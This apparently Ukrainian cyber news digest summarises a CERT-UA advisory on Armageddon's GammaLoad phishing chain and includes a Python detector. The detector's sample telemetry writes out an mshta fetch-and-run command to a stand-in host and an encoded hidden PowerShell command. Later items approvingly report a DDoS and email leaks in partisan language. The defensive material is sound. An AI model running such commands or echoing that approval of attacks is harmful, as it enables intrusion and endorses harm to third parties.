The 27th of July, Cyber News


Cyberattacks of the UAC-0010 (Armageddon) Group Using the GammaLoad.PS1_v2 Malware

The Government Computer Emergency Response Team of Ukraine (CERT-UA) has detected mass distribution of e-mails with the subjects «Information bulletin» and «Combat order», some of them purporting to come from the National Academy of Security of Ukraine. The e-mails are sent to the private e-mail addresses of the targets rather than to their official ones.

The attachment is an HTM dropper; opening it creates a RAR archive on the computer, for example «22_07_2022.rar». The archive contains an LNK file with a name tailored to the victim, for example «Information bulletin of the Counterintelligence Department of the Security Service of Ukraine dated July 22, 2022.lnk». Running the shortcut downloads and executes an HTA file, which may contain VBScript code that uses PowerShell to decode and run the GammaLoad.PS1_v2 malware.

Note that the attackers avoid ordinary DNS resolution of their command-and-control domain names: to obtain the A-records (IP addresses) they query third-party services over HTTPS instead, for example hxxps://cloudflare-dns[.]com/dns-query, hxxps://whoer[.]net/ru/checkwhois and others. Such lookups never reach the organisation's own DNS servers and therefore do not appear in DNS logs, so monitoring should also cover outbound HTTPS connections from script hosts (mshta.exe, powershell.exe, wscript.exe) to public resolver and whois services.

We also note an increase in the intensity of attacks using the described tactics and call for systematic measures to reduce the attack surface (attack surface management): for example, the use of third-party mail services on official equipment bypasses the existing security perimeter, because the content and attachments of such e-mails are not inspected by the organisation's security tools.

CERT-UA attributes the described activity to the group UAC-0010 (Armageddon). [1]
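As an added illustration for this digest (not code from CERT-UA's advisory), the following Python sketch turns the three observable steps of the chain above into detection logic and runs it over constructed endpoint telemetry: mshta.exe launched from explorer.exe with a remote HTA URL (the LNK), PowerShell with an encoded command spawned by mshta.exe (the HTA's VBScript), and a script host contacting a public resolver or whois service over HTTPS (the C2 address lookup). The Sysmon-like event schema, host names, process IDs, the placeholder domain example.invalid and the addition of dns.google to the two services named above are all assumptions.

```python
"""Hunt for the UAC-0010 (Armageddon) delivery chain in endpoint telemetry.

Added example for this digest; not CERT-UA code. The event schema is an
assumption (a minimal Sysmon-like shape); every event below is constructed.
"""
import re

# Script hosts abused in the chain described above (LNK -> HTA -> PowerShell).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Public services used to resolve the C2 name without touching internal DNS.
# Assumption: dns.google is added to the two services named in the advisory.
THIRD_PARTY_RESOLVERS = {"cloudflare-dns.com", "whoer.net", "dns.google"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -e / -enc / -EncodedCommand, or inline Base64 decoding in the command line.
ENCODED_PS_RE = re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\b|frombase64string", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert dict per observed step of the chain."""
    alerts = []
    # Index process-creation events so a child can look up its parent image.
    procs = {(e["host"], e["pid"]): e for e in events if e["type"] == "process"}

    for e in events:
        image = _basename(e["image"])
        if e["type"] == "process":
            parent = procs.get((e["host"], e["ppid"]))
            parent_image = _basename(parent["image"]) if parent else ""
            # Step 1: the LNK runs mshta.exe with a remote HTA URL; the parent is
            # explorer.exe because the user double-clicked the shortcut.
            if image == "mshta.exe" and parent_image == "explorer.exe" and URL_RE.search(e["cmdline"]):
                alerts.append({"host": e["host"], "rule": "lnk_to_remote_hta", "detail": e["cmdline"]})
            # Step 2: the HTA's VBScript launches PowerShell with an encoded payload.
            if image in {"powershell.exe", "pwsh.exe"} and parent_image == "mshta.exe" \
                    and ENCODED_PS_RE.search(e["cmdline"]):
                alerts.append({"host": e["host"], "rule": "encoded_powershell_from_mshta", "detail": e["cmdline"]})
        elif e["type"] == "network":
            # Step 3: a script host asks a public resolver / whois service for the
            # C2 address over HTTPS. Browsers use DoH legitimately, so only script
            # hosts count here.
            dest = e["dest_host"].lower()
            url = e.get("url", "")
            if image in SCRIPT_HOSTS and (dest in THIRD_PARTY_RESOLVERS or "/dns-query" in url.lower()):
                alerts.append({"host": e["host"], "rule": "c2_resolution_via_third_party",
                               "detail": f"{image} -> {url or dest}"})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: one infected host (ws01) and one clean host (ws02).
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "pid": 1200, "ppid": 900,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # The user opened the LNK from the RAR archive; example.invalid stands in for the C2.
    {"type": "process", "host": "ws01", "pid": 4012, "ppid": 1200,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/bulletin.hta"},
    # The HTA's VBScript starts PowerShell with a Base64 (UTF-16LE) command.
    {"type": "process", "host": "ws01", "pid": 4100, "ppid": 4012, "image": PS,
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "network", "host": "ws01", "pid": 4100, "image": PS,
     "dest_host": "cloudflare-dns.com",
     "url": "https://cloudflare-dns.com/dns-query?name=example.invalid&type=A"},
    {"type": "network", "host": "ws01", "pid": 4100, "image": PS,
     "dest_host": "whoer.net", "url": "https://whoer.net/ru/checkwhois"},
    # Benign: a browser using DoH, and an administrator running a script.
    {"type": "network", "host": "ws02", "pid": 5000,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "cloudflare-dns.com", "url": "https://cloudflare-dns.com/dns-query"},
    {"type": "process", "host": "ws02", "pid": 5100, "ppid": 1300, "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['host']}] {a['rule']}: {a['detail']}")
```

Run stand-alone, it reports four alerts for ws01 and none for ws02. The resolver list is only a starting point: the attackers can switch to any other public DoH or whois service, so the stronger signal is the combination of a script host as the originating process and the parent-child chain, not the destination names alone.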


New Attack of the IT ARMY of Ukraine

The IT ARMY of Ukraine carried out a successful DDoS attack on the online resources of Artemy Lebedev, a propagandist and looter who was once mistaken for a designer. Among his «credits» are an entry in the Myrotvorets database and NSDC sanctions imposed on him even before the start of the full-scale invasion by the rashists. [2], [3]


Anonymous Attacked Jhonlin Group

Anonymous released more than 600,000 hacked emails (513 GB) from the Jhonlin Group, an Indonesian mining and palm oil plantation conglomerate.

The conglomerate is known for using the police to intimidate journalists and activists. At least one journalist has died in prison after being arrested over complaints from the company. [4]

In the US, Data Was «Leaked» from a Government Server

5,000 emails (2.7 GB) were leaked from a government server in Bedford County, Pennsylvania, with material dating back to February 5, 2021. The information was initially given to the Hollidaysburg Community Watchdog, which provided a copy to Distributed Denial of Secrets as protection against censorship attempts. [5]